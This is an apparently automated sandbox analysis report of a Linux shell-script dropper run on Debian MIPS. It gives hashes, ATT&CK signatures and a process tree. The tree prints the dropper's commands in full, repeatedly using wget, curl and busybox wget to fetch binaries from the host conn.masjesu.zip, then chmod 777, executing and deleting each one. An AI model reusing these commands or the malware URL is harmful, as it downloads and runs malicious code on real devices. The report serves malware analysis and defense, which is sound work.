e3f4d2c63d1e3f03e250a0f4ffa16158d9b86b798278c35c7935c1fb21b3765e

Analysis

max time kernel
101s
max time network
104s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
19/11/2024, 11:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e3f4d2c63d1e3f03e250a0f4ffa16158d9b86b798278c35c7935c1fb21b3765e.sh
Size

10KB
MD5

bf2013c58e6afc9c6a41a659e6578665
SHA1

545dca2856f206869654fe4b32911a95536f2a7d
SHA256

e3f4d2c63d1e3f03e250a0f4ffa16158d9b86b798278c35c7935c1fb21b3765e
SHA512

78deb34893d14c46cae969dd2d8dfdc09cb8eee191aed5e15d09d202d880318b372c65e11e37f97d2db2c225376711268240e4e6ce1041fd387197de132c68c3
SSDEEP

192:jQRWWCBwvyJWO0EzWC1dUev0EzWCnkiWCVd:jQRWWCGv2WoudiWCf

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
979	chmod
726	chmod
874	chmod
895	chmod
937	chmod
930	chmod
944	chmod
916	chmod
923	chmod
958	chmod
799	chmod
881	chmod
814	chmod
860	chmod
902	chmod
951	chmod
986	chmod
853	chmod
867	chmod
888	chmod
909	chmod
972	chmod
762	chmod
846	chmod
965	chmod
993	chmod
733	chmod
792	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
920	curl
940	wget
955	curl
899	curl
905	wget
948	curl
978	busybox
841	busybox
870	wget
891	wget
915	busybox
936	busybox
957	busybox
730	curl
808	busybox
871	curl
898	wget
906	curl
943	busybox
975	wget
992	busybox
796	curl
798	busybox
878	curl
934	curl
950	busybox
968	wget
969	curl
982	wget
736	wget
820	wget
990	curl
929	busybox
947	wget
894	busybox
926	wget
880	busybox
887	busybox
983	curl
803	curl
857	curl
873	busybox
941	curl
976	curl
753	busybox
849	wget
908	busybox
919	wget
954	wget
722	curl
725	busybox
866	busybox
961	wget
989	wget
768	wget
776	curl
884	wget
912	wget
700	wget
729	wget
864	curl
885	curl
927	curl
964	busybox

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ	curl
File opened for modification	/tmp/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE	curl
File opened for modification	/tmp/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw	curl
File opened for modification	/tmp/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn	curl
File opened for modification	/tmp/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw	curl
File opened for modification	/tmp/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG	curl
File opened for modification	/tmp/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE	curl
File opened for modification	/tmp/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt	curl
File opened for modification	/tmp/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG	curl
File opened for modification	/tmp/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN	curl
File opened for modification	/tmp/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt	curl
File opened for modification	/tmp/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN	curl
File opened for modification	/tmp/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt	curl
File opened for modification	/tmp/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx	curl
File opened for modification	/tmp/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt	curl
File opened for modification	/tmp/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR	curl
File opened for modification	/tmp/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f	curl
File opened for modification	/tmp/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD	curl
File opened for modification	/tmp/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn	curl
File opened for modification	/tmp/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV	curl
File opened for modification	/tmp/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ	curl
File opened for modification	/tmp/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx	curl
File opened for modification	/tmp/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV	curl
File opened for modification	/tmp/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR	curl
File opened for modification	/tmp/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f	curl
File opened for modification	/tmp/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD	curl
File opened for modification	/tmp/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG	curl
File opened for modification	/tmp/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG	curl

/tmp/e3f4d2c63d1e3f03e250a0f4ffa16158d9b86b798278c35c7935c1fb21b3765e.sh
/tmp/e3f4d2c63d1e3f03e250a0f4ffa16158d9b86b798278c35c7935c1fb21b3765e.sh
1⤵
PID:694
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:697
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  - System Network Configuration Discovery
  PID:700
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:722
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  - System Network Configuration Discovery
  PID:725
- /bin/chmod
  chmod 777 inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  - File and Directory Permissions Modification
  PID:726
- /tmp/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  ./inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  - Executes dropped EXE
  PID:727
- /bin/rm
  rm inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  PID:728
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  - System Network Configuration Discovery
  PID:729
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:730
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  PID:732
- /bin/chmod
  chmod 777 JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  - File and Directory Permissions Modification
  PID:733
- /tmp/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  ./JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  - Executes dropped EXE
  PID:734
- /bin/rm
  rm JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  PID:735
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  - System Network Configuration Discovery
  PID:736
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:744
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  - System Network Configuration Discovery
  PID:753
- /bin/chmod
  chmod 777 bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  - File and Directory Permissions Modification
  PID:762
- /tmp/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  ./bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  - Executes dropped EXE
  PID:763
- /bin/rm
  rm bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  PID:766
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - System Network Configuration Discovery
  PID:768
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:776
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  PID:790
- /bin/chmod
  chmod 777 gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - File and Directory Permissions Modification
  PID:792
- /tmp/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  ./gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - Executes dropped EXE
  PID:793
- /bin/rm
  rm gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  PID:794
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  PID:795
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:796
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  - System Network Configuration Discovery
  PID:798
- /bin/chmod
  chmod 777 BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  - File and Directory Permissions Modification
  PID:799
- /tmp/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  ./BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  - Executes dropped EXE
  PID:800
- /bin/rm
  rm BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  PID:801
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  PID:802
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:803
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  - System Network Configuration Discovery
  PID:808
- /bin/chmod
  chmod 777 VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  - File and Directory Permissions Modification
  PID:814
- /tmp/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  ./VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  - Executes dropped EXE
  PID:815
- /bin/rm
  rm VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  PID:819
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  - System Network Configuration Discovery
  PID:820
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:833
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  - System Network Configuration Discovery
  PID:841
- /bin/chmod
  chmod 777 qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  - File and Directory Permissions Modification
  PID:846
- /tmp/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  ./qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  - Executes dropped EXE
  PID:847
- /bin/rm
  rm qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  PID:848
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  - System Network Configuration Discovery
  PID:849
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:850
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  PID:852
- /bin/chmod
  chmod 777 0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  - File and Directory Permissions Modification
  PID:853
- /tmp/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  ./0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  - Executes dropped EXE
  PID:854
- /bin/rm
  rm 0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  PID:855
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  PID:856
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:857
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  PID:859
- /bin/chmod
  chmod 777 yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  - File and Directory Permissions Modification
  PID:860
- /tmp/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  ./yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  - Executes dropped EXE
  PID:861
- /bin/rm
  rm yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  PID:862
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  PID:863
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:864
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  - System Network Configuration Discovery
  PID:866
- /bin/chmod
  chmod 777 JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  - File and Directory Permissions Modification
  PID:867
- /tmp/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  ./JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  - Executes dropped EXE
  PID:868
- /bin/rm
  rm JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  PID:869
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - System Network Configuration Discovery
  PID:870
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:871
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - System Network Configuration Discovery
  PID:873
- /bin/chmod
  chmod 777 xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - File and Directory Permissions Modification
  PID:874
- /tmp/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  ./xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - Executes dropped EXE
  PID:875
- /bin/rm
  rm xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  PID:876
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  PID:877
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:878
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  - System Network Configuration Discovery
  PID:880
- /bin/chmod
  chmod 777 LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  - File and Directory Permissions Modification
  PID:881
- /tmp/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  ./LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  - Executes dropped EXE
  PID:882
- /bin/rm
  rm LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  PID:883
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - System Network Configuration Discovery
  PID:884
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:885
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - System Network Configuration Discovery
  PID:887
- /bin/chmod
  chmod 777 fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - File and Directory Permissions Modification
  PID:888
- /tmp/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  ./fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - Executes dropped EXE
  PID:889
- /bin/rm
  rm fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  PID:890
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - System Network Configuration Discovery
  PID:891
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:892
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - System Network Configuration Discovery
  PID:894
- /bin/chmod
  chmod 777 D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - File and Directory Permissions Modification
  PID:895
- /tmp/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  ./D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - Executes dropped EXE
  PID:896
- /bin/rm
  rm D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  PID:897
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  - System Network Configuration Discovery
  PID:898
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:899
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  PID:901
- /bin/chmod
  chmod 777 yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  - File and Directory Permissions Modification
  PID:902
- /tmp/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  ./yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  - Executes dropped EXE
  PID:903
- /bin/rm
  rm yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  PID:904
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  - System Network Configuration Discovery
  PID:905
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:906
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  - System Network Configuration Discovery
  PID:908
- /bin/chmod
  chmod 777 JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  - File and Directory Permissions Modification
  PID:909
- /tmp/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  ./JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  - Executes dropped EXE
  PID:910
- /bin/rm
  rm JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  PID:911
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - System Network Configuration Discovery
  PID:912
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:913
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - System Network Configuration Discovery
  PID:915
- /bin/chmod
  chmod 777 xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - File and Directory Permissions Modification
  PID:916
- /tmp/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  ./xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - Executes dropped EXE
  PID:917
- /bin/rm
  rm xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  PID:918
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  - System Network Configuration Discovery
  PID:919
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:920
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  PID:922
- /bin/chmod
  chmod 777 LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  - File and Directory Permissions Modification
  PID:923
- /tmp/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  ./LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  - Executes dropped EXE
  PID:924
- /bin/rm
  rm LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  PID:925
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - System Network Configuration Discovery
  PID:926
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:927
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - System Network Configuration Discovery
  PID:929
- /bin/chmod
  chmod 777 fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - File and Directory Permissions Modification
  PID:930
- /tmp/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  ./fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - Executes dropped EXE
  PID:931
- /bin/rm
  rm fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  PID:932
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  PID:933
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:934
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - System Network Configuration Discovery
  PID:936
- /bin/chmod
  chmod 777 D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - File and Directory Permissions Modification
  PID:937
- /tmp/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  ./D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - Executes dropped EXE
  PID:938
- /bin/rm
  rm D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  PID:939
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  - System Network Configuration Discovery
  PID:940
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:941
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  - System Network Configuration Discovery
  PID:943
- /bin/chmod
  chmod 777 inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  - File and Directory Permissions Modification
  PID:944
- /tmp/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  ./inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  - Executes dropped EXE
  PID:945
- /bin/rm
  rm inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  PID:946
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  - System Network Configuration Discovery
  PID:947
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:948
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  - System Network Configuration Discovery
  PID:950
- /bin/chmod
  chmod 777 JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  - File and Directory Permissions Modification
  PID:951
- /tmp/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  ./JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  - Executes dropped EXE
  PID:952
- /bin/rm
